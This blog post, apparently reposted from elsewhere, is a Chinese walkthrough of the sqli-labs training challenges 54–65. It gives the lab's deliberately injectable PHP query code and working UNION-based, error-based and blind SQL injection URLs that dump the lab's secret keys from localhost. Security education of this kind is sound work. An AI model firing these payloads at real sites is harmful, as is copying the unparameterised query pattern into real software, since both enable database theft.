SQLI-LAB 的 实战记录(Less 54 - Less 65)
来源:互联网 发布:c语言编程经典例题 编辑:程序博客网 时间:2024/05/21 17:59
- Less - 54 Challenge-1
- Test
- Sourse Code
- Solution
- Less - 55 Challenge-2
- Test
- Sourse Code
- Solution
- Less - 56 Challenge-3
- Test
- Sourse Code
- Solution
- Less - 57 Challenge-4
- Test
- Sourse Code
- Solution
- Less - 58 Challenge-5
- Test
- Sourse Code
- Solution
- Less - 59 Challenge-6
- Test
- Sourse Code
- Solution
- Less - 60 Challenge-7
- Test
- Sourse Code
- Solution
- Less - 61 Challenge-8
- Test
- Sourse Code
- Solution
- Less - 62 Challenge-9
- Test
- Sourse Code
- Solution
- Less - 63 Challenge-10
- Test
- Sourse Code
- Solution
- Less - 64 Challenge-11
- Test
- Sourse Code
- Solution
- Less - 65 Challenge-12
- Test
- Sourse Code
- Solution
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 54 Challenge-1
(第54节:挑战 - 1)
Test:
http://localhost/sqli-lab/Less-54/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts
注:数据库名:challenges 最多尝试次数:10
http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+
注:正常,id周围是单引号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+ //2x51x9lc2b http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+ //id,sessid,secret_QD6G,tryy http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+ //t5OPJLdkJ60DsyF7T1ZL3rfD //140491cdf5b17300fc51147a33ae86bf注:正则匹配直接暴表名,列名: http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;
Less - 55 Challenge-2
(第55节:挑战 - 2)
Test:
http://localhost/sqli-lab/Less-55/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14
http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+ http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+ http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+ http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+
注:正常,id周围是一层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+ // tyqb9xz99r http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+ // id,sessid,secret_0LLE,tryy http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+ // HvXC6g9NxUeGwZtpfdEYCtUO // 486412045b0a355f953e5aa5c8446bcb
Less - 56 Challenge-3
(第56节:挑战 - 3)
Test:
http://localhost/sqli-lab/Less-56/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14
http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+ http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+ http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+
注:正常,id周围是双引号和一层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+ // l1meh6v8xf http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+ // id,sessid,secret_ZIEU,tryy http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+ //3zjx2Ef32x2clWJlRlS4n2wc // 2de68a7c5e3db6a836ab8f5f109416b8
Less - 57 Challenge-4
(第57节:挑战 - 4)
Test:
http://localhost/sqli-lab/Less-57/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14
http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+ http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+ http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+
注:正常,id周围是双引号
Sourse Code:
$id= '"'.$id.'"';$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+ // la5spfxomc http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+ // id,sessid,secret_D2E9,tryy http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+ // AkXpuSMRL2Mjnxbu6ChgdDkI // 2c26f9a59b0ba61233e6fc0af8e47f14
Less - 58 Challenge-5
(第58节:挑战 - 5)
Test:
http://localhost/sqli-lab/Less-58/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+
注:正常
http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘) union select 1,2,3 – ’ LIMIT 0,1’ at line 1
注:id周围是单引号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ print_r(mysql_error()); }
Solution:
http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //qrso3pw6sh::challenges::1 http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //id,sessid,secret_MV87,tryy::1 http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ // 3XJM8hjFz6KNK5aoNUSApgRW::1
Less - 59 Challenge-6
(第59节:挑战 - 6)
Test:
http://localhost/sqli-lab/Less-59/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” union select 1,2,3 – LIMIT 0,1’ at line 1
注:id周围没有符号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ // b3ndcj1o8v::challenges::1 http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //id,sessid,secret_ZWS2,tryy::1 http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ // zhEVMVgMavK0k92OSv8zmTTm::1
Less - 60 Challenge-7
(第60节:挑战 - 7)
Test:
http://localhost/sqli-lab/Less-60/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – “) LIMIT 0,1’ at line 1
注:id周围是双引号和一层括号
Sourse Code:
$id = '("'.$id.'")';$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ print_r(mysql_error()); }
Solution:
http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //p9gd2w7p0n::challenges::1 http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //id,sessid,secret_THZK,tryy::1 http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ // OSpAsCGlNQ8qbUtTnEXHd0WL::1
Less - 61 Challenge-8
(第61节:挑战 - 8)
Test:
http://localhost/sqli-lab/Less-61/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5
http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – ‘)) LIMIT 0,1’ at line 1
注:id周围是单引号和两层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //t44dfrest6::challenges::1 http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ //id,sessid,secret_BN4M,tryy::1 http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+ // dqlfs35mo8ZZlYKFZIvXboSe::1
Less - 62 Challenge-9
(第62节:挑战 - 9)
Test:
http://localhost/sqli-lab/Less-62/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+
注:正常,id周围是单引号和一层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+ //表名 第一个字符:w // wlo99z7cua http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+ //10110 = 22 ,列名中倒数第四个字符:V // secret_VUBV http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+ http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+ // key 的 第一个字符:1 // 1kqTprKdfAt6VGFEoEcpYgjG
注:随机值
表名 10位 由 小写字母和数字 组成
secret_XXXX 后四位由 大写字母和数字 组成
key 24位 由 大小写字母和数字 组成
Less - 63 Challenge-10
(第63节:挑战 - 10)
Test:
http://localhost/sqli-labess-63/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+
注:正常,id周围是单引号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ //print_r(mysql_error()); }
Solution:
http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+ http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+ http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+ http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+ http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+ http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+ // key 的 第一个字符:G // Gd65kBLDXbCY7wrwRq5jzM4l
Less - 64 Challenge-11
(第64节:挑战 - 11)
Test:
http://localhost/sqli-lab/Less-64/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+ http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+ http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+ http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+ http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+
注:正常,id周围是两层括号
Sourse Code:
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 64 --+ http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) > 97 --+ http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+ http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+ http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+ http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+ // key 的 第一个字符:g // gpu9QBywZI8jL2M7Uj6DDELa
Less - 65 Challenge-12
(第65节:挑战 - 12)
Test:
http://localhost/sqli-lab/Less-65/index.php
The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130
http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+
注:不显示正确信息
http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+ http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+
注:正常,id周围是双引号和一层括号
Sourse Code:
$id = '"'.$id.'"';$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4"); $pass = array_reverse($unames); echo 'Your Login name : '. $unames[$row['id']]; echo 'Your Password : ' .$pass[$row['id']];}else{ //print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+ http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+ // key 的 第一个字符:W // Wa0mYczFC0wFXygjAFaCA1Tb
- SQLI-LAB 的 实战记录(Less 54 - Less 65)
- SQLI-LAB 的 实战记录(Less 1 - Less 10)
- SQLI-LAB 的 实战记录(Less 11 - Less 20)
- SQLI-LAB 的 实战记录(Less 21 - Less 30)
- SQLI-LAB 的 实战记录(Less 31 - Less 40)
- SQLI-LAB 的 实战记录(Less 41 - Less 53)
- sqli-labs ---- Less-2
- sqli-labs ---- Less-7
- sqli-labs ---- Less-5 & Less-6
- sqli-labs ---- Less-1 & Less-3 & Less-4
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sqli-labs ---- Less-8 & Less-9 & Less-10
- [sqli-labs]Less-1(明注)
- SQLi-Labs 学习笔记(Less 51-65)
- 【SQL注入之sqli-labs】Less 1
- 【SQL注入之sqli-labs】Less 6
- less
- less
- linux service运行服务遇到的问题
- java 读取excel内容转为JSONArray(未测试)
- 采用pymouse编写的GUI自动测试工具 源码(二)
- 求出当前日期距离上一个指定日期的月数天数
- jmeter压测教程
- SQLI-LAB 的 实战记录(Less 54 - Less 65)
- MyBatis的配置以及crud操作
- Javaweb重点知识整理
- Mysql计算时间差函数
- Java获取随机数生成随机字符串用于验证码等之类的工具 (未测试)
- Hibernate中使用HQL进行查询操作
- PHP 计算Date类型的差值
- js获取页面及个元素高度、宽度
- OSX 安装MongoDB